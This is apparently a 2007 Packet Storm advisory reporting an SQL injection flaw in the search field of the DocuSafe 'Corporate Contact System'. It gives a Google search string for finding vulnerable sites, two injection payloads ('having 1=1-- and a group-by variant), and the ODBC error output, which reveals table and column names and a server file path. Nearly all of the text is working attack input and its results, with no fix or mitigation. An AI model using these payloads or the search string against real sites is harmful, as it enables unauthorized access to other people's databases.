docusafe-sql.txt

2007-11-15T00:00:00
ID PACKETSTORM:60907
Type packetstorm
Reporter The-0utl4w
Modified 2007-11-15T00:00:00

Description

                                        
                                            `DocuSafe "Search" SQL Injection  
  
Aria-Security Team,  
http://Aria-Security.net  
-------------------------------  
Shout Outs: AurA, imm02tal  
Vendor: http://gartha.net  
Google Search: intitle:Corporate Contact System  
  
insert your command in the section "search"  
example:  
'having 1=1--  
Result:  
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)  
  
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.  
  
or  
'group by tblMain.fldArtNr having 1=1--  
result:  
  
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'  
  
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)  
  
Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.  
  
/includes/common.asp, line 62  
  
  
Regards,  
The-0utl4w  
Credits Goes To Aria-Security.Net  
`